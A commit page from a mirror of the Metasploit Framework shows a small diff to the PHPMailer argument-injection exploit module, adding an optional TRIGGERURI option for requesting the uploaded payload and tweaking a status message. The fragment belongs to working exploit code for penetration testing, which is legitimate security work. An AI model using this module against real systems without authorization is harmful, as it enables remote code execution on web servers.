infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add an optional explicit triggeruri for phpmailer

bug/bundler_fix
Spencer McIntyre 2016-12-30 14:24:07 -05:00
parent 64037b0d6e
commit 1eab4b3a7d
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/multi/http/phpmailer_arg_injection.rb
View File

@ -48,8 +48,9 @@ class MetasploitModule < Msf::Exploit::Remote
register_options( register_options(
[ [
OptString.new('TARGETURI', [true, 'Path to the application root', '/']), OptString.new('TARGETURI', [true, 'Path to the application root', '/']),
OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www']) OptString.new('TRIGGERURI', [false, 'Path to the uploaded payload', '']),
OptString.new('WEB_ROOT', [true, 'Path to the web root', '/var/www'])
], self.class) ], self.class)
register_advanced_options( register_advanced_options(
[ [
@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def trigger(trigger_uri) def trigger(trigger_uri)
print_status('Sleeping before requesting the written file') print_status("Sleeping before requesting the payload from: #{trigger_uri}")
page_found = false page_found = false
sleep_time = 10 sleep_time = 10
@ -117,6 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
) )
register_files_for_cleanup(payload_file_path) register_files_for_cleanup(payload_file_path)
trigger(normalize_uri(target_uri, payload_file_name))
trigger(normalize_uri(datastore['TRIGGERURI'].blank? ? target_uri : datastore['TRIGGERURI'], payload_file_name))
end end
end end